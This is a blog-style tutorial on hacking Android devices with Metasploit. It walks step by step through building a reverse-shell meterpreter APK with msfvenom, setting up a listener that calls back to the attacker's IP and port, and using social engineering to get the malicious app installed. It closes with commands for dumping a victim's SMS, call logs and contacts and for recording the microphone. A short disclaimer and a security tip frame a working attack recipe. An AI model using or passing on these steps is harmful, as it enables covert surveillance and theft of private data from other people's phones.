Ever wanted to know how hacking Android devices works? You will know in this article.
We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.
This tutorial is only for education purposes only, please don’t try to hack anyone’s Android device without thier permission.Desclaimer
Step 1) Fire up your Linux terminal (Ctrl + Alt + T)
Step 2) Now we need to open a Metasploit Console becasue we’ll do most of our explotion in that console, just run this command in terminal. You may need to enter your account password.
Step 3) It may take some time to load the console, once it’s gets loaded we search for exploit for Android and check if it exists in db. Run this command to list all available exploits for Android
search type:exploit platform:android
Then you’ll see a list of all Android exploit available in db. We gonna use exploit/multi/handler exploit.
Step 4) Run this command to set exploit
Step 5) Now we need a Payload for exploit (It is needed for retriving data). If you search for Android payloads (using search type:payload platform:android), we gonna use payload/android/meterpreter/reverse_tcp as payload.
Just fire below command
set payload android/meterpreter/reverse_tcp
Step 6) Now we need to set LHOST (Local Host) to receive payload data in this console. We’ll need our local ip, we’ll get our ip using ifconfig.
Open a new terminal and Run below command to get IP.
sudo ifconfig | grep inet
Find inet you’ll see something like this, note that ip address we’ll need it.
Step 7) Back to msfconsole, run below command in terminal to set our ip in LHOST
set LHOST 192.168.1.210
Step 8) We also need a port to listen data. you can use any port but keep it constant. We’ll use 4444
set LPORT 4444
Step 9) Now we need to run the exploit, just fire below command in terminal
Here comes the part where we have to use social engineering in order to install malware apk to target Android device. But since we are testing this in our device, we don’t have to use social engineering 😛
Step 10) Now we need to make venomous apk using msfvenom which uses same configuration we used in making the exploit. Run below command in a new terminal.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=4444 R > venomApp.apk
- -p indicates a payload type
- android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
- LHOST is your local IP
- LPORT is set to be as a listening port
- R> would give the output directly on /home/kali
- apk is the final name of the final output
Step 11) You’ll find the apk in your home folder, just copy it in you Android device.
Step 12) Now install it in your device. (I am using Android 9 device). After installing now open Main Activity
Step 13) Now move back to terminal, you’ll see something like in this image. Bingo you successfully hacked into this android device. Try running sysinfo to see device details.
Play with commands now
Use help command to see all commands. Try exploring all commands. Here are some commands you can try.
|dump_sms||Get SMS messages|
|dump_calllog||Get call log|
|dump_contacts||Get contacts list|
|record_mic||Record audio from mic|
|screenshare||Start a screen record (may not work)|
|screenshot||Grab a screenshot (may not work)|
|app_run||Start an app|
|app_install||Request to install apk file|
Hope you liked this tutorial on hacking Android devices. Try not to do anything illegal. Please share this with your friends. A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.
Happy Hacking Android.